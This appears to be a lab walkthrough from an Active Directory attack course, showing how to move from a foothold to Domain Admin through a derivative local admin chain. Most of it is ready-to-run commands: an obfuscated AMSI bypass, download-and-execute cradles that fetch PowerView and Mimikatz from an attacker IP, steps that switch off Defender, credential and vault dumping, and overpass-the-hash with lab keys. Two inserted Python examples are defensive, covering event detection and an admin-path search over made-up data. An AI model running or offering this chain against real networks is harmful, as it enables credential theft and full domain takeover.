Obj 7 Derivative Local Admin

Task - Target a machine where a Domain Admin has a session, compromise that machine, and escalate privileges to Domain Admin.

Run AMSI bypass on machine

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Load PowerView onto the machine

iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))

Find where domain admin users have sessions (Find-DomainUserLocation checks Domain Admins by default)

Find-DomainUserLocation 

Check if we can run commands on the sessions available

Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt

Get Mimikatz on the Target Machine

iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1 -UseBasicParsing)

Create a new session for Target Machine

$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local

Disable Protections and AMSI on Target Machine

Invoke-Command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess

Now we can Invoke Mimikatz on Target Machine to Get Creds

Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

Now we can use Over Pass the Hash with the svcadmin keys we dumped

Rubeus, Mimikatz or SafetyKatz can all be used for this.

Rubeus Over Pass The Hash

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

Mimikatz Over Pass The Hash

Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"'

SafetyKatz Over Pass The Hash

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"
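Added example (not code from the original notes or from the tools they use): detection logic for the host-level traces that disabling Defender and starting a process with stolen keys leave behind, run over constructed sample event records. The record shape is an assumption, one dict per Windows event with keys named after the EventData fields of Security 4624 and the Defender/Operational 5001 event.

```python
# Constructed sample events (not real log data); field names follow the
# EventData names of Security 4624 and Defender/Operational 5001.
SAMPLE_EVENTS = [
    {"Channel": "Security", "EventID": 4624, "Computer": "dcorp-adminsrv",
     "TargetUserName": "svcadmin", "LogonType": 9,
     "LogonProcessName": "seclogo", "AuthenticationPackageName": "Negotiate"},
    {"Channel": "Security", "EventID": 4624, "Computer": "dcorp-adminsrv",
     "TargetUserName": "student1", "LogonType": 2,
     "LogonProcessName": "User32", "AuthenticationPackageName": "Negotiate"},
    {"Channel": "Microsoft-Windows-Windows Defender/Operational", "EventID": 5001,
     "Computer": "dcorp-adminsrv"},
    {"Channel": "Security", "EventID": 4624, "Computer": "dcorp-mgmt",
     "TargetUserName": "svcadmin", "LogonType": 3,
     "LogonProcessName": "Kerberos", "AuthenticationPackageName": "Kerberos"},
]


def is_netonly_logon(ev):
    """4624 with LogonType 9 (NewCredentials): both sekurlsa::pth and Rubeus
    /createnetonly start a process with alternate network credentials, and
    LogonProcessName 'seclogo' is the usual marker of that path."""
    return (ev.get("Channel") == "Security" and ev.get("EventID") == 4624
            and ev.get("LogonType") == 9)


def is_rtp_disabled(ev):
    """Defender/Operational 5001: real-time protection was turned off, which is
    what Set-MpPreference -DisableRealtimeMonitoring $true leaves in the log."""
    return "Windows Defender" in ev.get("Channel", "") and ev.get("EventID") == 5001


def find_alerts(events):
    """Return a per-host list of alert tags."""
    alerts = {}
    for ev in events:
        if is_netonly_logon(ev):
            tag = "netonly_logon:%s:%s" % (ev["TargetUserName"], ev["LogonProcessName"])
        elif is_rtp_disabled(ev):
            tag = "defender_rtp_disabled"
        else:
            continue
        alerts.setdefault(ev["Computer"], []).append(tag)
    return alerts


def hosts_with_both(alerts):
    """Hosts showing AV tampering and a NewCredentials logon: the exact
    sequence used above (disable Defender, then spawn a process with dumped keys)."""
    return sorted(h for h, tags in alerts.items()
                  if "defender_rtp_disabled" in tags
                  and any(t.startswith("netonly_logon") for t in tags))
```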

- DERIVATIVE LOCAL ADMIN -

In the process we started with the svcadmin credentials above, we check which machines we can reach as local admin.

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
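Added example (not code from the original notes or from Find-PSRemotingLocalAdminAccess): the derivative local admin chain the steps above walk, computed as a breadth-first search over constructed admin-rights and session data. The host and account names mirror the lab but the data is made up; a defender runs the same search over real group membership and session data to find chains to break.

```python
from collections import deque

# Constructed data (assumption, not a real inventory): which accounts are
# local admins on which hosts, and which accounts have a logon session there.
LOCAL_ADMINS = {
    "dcorp-adminsrv": {"student1", "srvadmin"},
    "dcorp-mgmt": {"srvadmin", "svcadmin"},
    "dcorp-dc": {"svcadmin"},
}
SESSIONS = {
    "dcorp-adminsrv": {"srvadmin"},
    "dcorp-mgmt": {"svcadmin"},
}


def admin_paths(start_user, target_host):
    """Breadth-first search over (account, path) states.

    From an account, step onto every host it administers; on each such host,
    every account with a session becomes a new starting point (its credentials
    are now obtainable). Returns the first chain reaching target_host, or None.
    """
    queue = deque([(start_user, [start_user])])
    seen = {start_user}
    while queue:
        user, path = queue.popleft()
        for host, admins in LOCAL_ADMINS.items():
            if user not in admins:
                continue
            hop = path + [host]
            if host == target_host:
                return hop
            for cred in SESSIONS.get(host, ()):
                if cred not in seen:
                    seen.add(cred)
                    queue.append((cred, hop + [cred]))
    return None


def hosts_exposing(account):
    """Hosts where the given account keeps a session, i.e. where local admins
    can harvest it; these are the sessions a defender wants gone."""
    return sorted(h for h, users in SESSIONS.items() if account in users)
```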

We can start a PSSession on any available machines we find

Enter-PSSession -ComputerName dcorp-adminsrv

We need to check what language mode we are in first.

$ExecutionContext.SessionState.LanguageMode

Next we can check the AppLocker policy to see if/where we can run scripts from

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

We can now disable Windows Defender real-time protection and AMSI in the session

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true -Verbose

Create a Modified Mimikatz script to execute on load

Create a copy of Invoke-Mimikatz.ps1 and rename it to Invoke-MimikatzEx.ps1.
-Open Invoke-MimikatzEx.ps1 in PowerShell ISE
-Add Invoke-Mimikatz -Command '"sekurlsa::ekeys"' to the very end of the file.

Now we can transfer the new file over

We are copying this from our foothold machine in the process created for svcadmin

PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimikatzEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

Back on the Target Machine we can invoke Mimikatz

[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimikatzEx.ps1

Over Pass the Hash with SafetyKatz

Again, SafetyKatz, Rubeus or Mimikatz can be used for this. We will use one of the credentials found in the previous hash dump.

C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

In the new process that started, we run InviShell and look for PSRemoting local admin access again.

. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose

Extract credentials from the machines we found using SafetyKatz

Mimikatz would also work here, but this time we use SafetyKatz, so we first need to copy Loader.exe to the target machine.

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

We can now winrs or PSRemote in and Invoke SafetyKatz

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

We can do the same as above with Mimikatz to dump the credentials of the target machine

  1. First we need to disable AMSI on the target machine (copy and paste the AMSI bypass)

  2. Download and execute Invoke-Mimikatz.ps1: iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1 -UseBasicParsing)

  3. On the target machine run: Invoke-Mimikatz -Command '"sekurlsa::ekeys"'

We can also dump credentials from the credentials vault with mimikatz

Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'

Finally we can use Over Pass the Hash with svcadmin credentials to start a new process as Domain Admin

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt